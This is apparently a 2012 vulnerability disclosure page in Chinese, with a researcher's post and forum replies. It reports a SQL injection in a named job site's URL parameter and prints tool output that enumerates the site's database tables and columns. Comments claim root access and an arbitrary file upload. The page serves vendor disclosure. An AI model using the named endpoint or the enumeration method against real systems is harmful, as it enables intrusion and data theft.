2012-05-29: 细节已通知厂商并且等待厂商处理中 2012-05-29: 厂商已经确认,细节仅向厂商公开 2012-06-08: 细节向核心白帽子及相关领域专家公开 2012-06-18: 细节向普通白帽子公开 2012-06-28: 细节向实习白帽子公开 2012-07-13: 细节向公众公开
嘎嘎嘎。昨晚忙了一晚上,还是有成果的。刚起床的童鞋伤不起啊。。。尼玛,想当老二不容易啊。15分+的有木有啊,有木有啊。高危漏洞给低分,尼玛伤不起啊。每晚抗战在一线,每天凌晨5点起床的人伤不起啊。*********此处省略10万字***************据说做老大能够有好东西(秘密哈)楼下的你们懂的..
http://www.baijob.com/p/campus/job?postid=7190Analyzing http://www.baijob.com/p/campus/job?postid=7190Host IP: 58.68.231.86Web Server: ApachePowered-by: PHP/5.3.10Keyword Found: Injection type is IntegerDB Server: MySQL >=5Selected Column Count is 3Valid String Column is 1Current DB: sr_campusCount(table_name) of information_schema.tables where table_schema=0x73725F63616D707573 is 6Tables found: sr_reinfo,sr_reinfo_md5,sr_reinfo_time_temp,sr_seminar,sr_seminar_md5,sr_seminar_time_tempCount(table_name) of information_schema.tables where table_schema=0x73725F63616D707573 is 6Tables found: sr_reinfo,sr_reinfo_md5,sr_reinfo_time_temp,sr_seminar,sr_seminar_md5,sr_seminar_time_tempCount(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F7265696E666F is 18Columns found: id,start_time,city,title,content,company_name,official_url,spide_time,visit_url,descriptin,is_usable,work_type,source_id,entity_id,refresh_time,url,ts,statusCount(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F7265696E666F5F6D6435 is 6Columns found: id,entity_id,MD5,source_id,system_id,statusCount(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F7265696E666F5F74696D655F74656D70 is 4Columns found: id,time,source_id,entity_idCount(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F73656D696E6172 is 15Columns found: id,city,school,location,company_name,start_time,spide_time,visit_url,description,is_usable,url,source_id,entity_id,ts,statusCount(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F73656D696E61725F6D6435 is 6Columns found: id,entity_id,MD5,source_id,system_id,statusCount(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F73656D696E61725F74696D655F74656D70 is 4Columns found: id,time,source_id,entity_idCount(*) of sr_campus.sr_seminar_md5 is 1675
白天的网速真给力,跑起数据来就是快。晚上老牛拉破车一样。
你们有最优秀的工程师,你们懂的。嘎嘎。By:301 QQ2036234
危害等级:高
漏洞Rank:18
确认时间:2012-05-29 22:39
感谢提交,我们会尽快处理
暂无
呵呵 大神 注意休息呀 不要太拼命了
@possible 趁我还有机会摸电脑,就搞搞,到时候又消失X月,想发也没得发了。
修复方案我打字打快了。。。@xsser“最低速度。” 麻烦删除下。
@zeracker 好吧 但是身体重要呀 在保证休息前提下 搞 呵呵 祝你早日归来
=。= 你马上就是老二了
该死的网络。忘记说了是root权限啊。神马数据都跑出来了。要求加分加分啊。
测试了下,root权限,5个账户,加默认的表一共8个表,很黄很暴力。有木有啊?
刚也找了一下,很明显的注入点。不知是不是同一个。呵呵。。还有头像上传那里。可以上传任意文件,不过只是不可执行。。。但应该也算是个风险。。
@Jannock 不是同一个哈。嘎嘎。root权限带头大哥出现了。。O(∩_∩)O哈哈~
@zeracker @_@ 兄弟你太低调了。。。很快就超过我了。。
@Jannock 哥,你的位置在wooyun是无法动摇的。
你们都好低调啊
莫非可以脱裤?不然不会那么高分。。。膜拜众牛!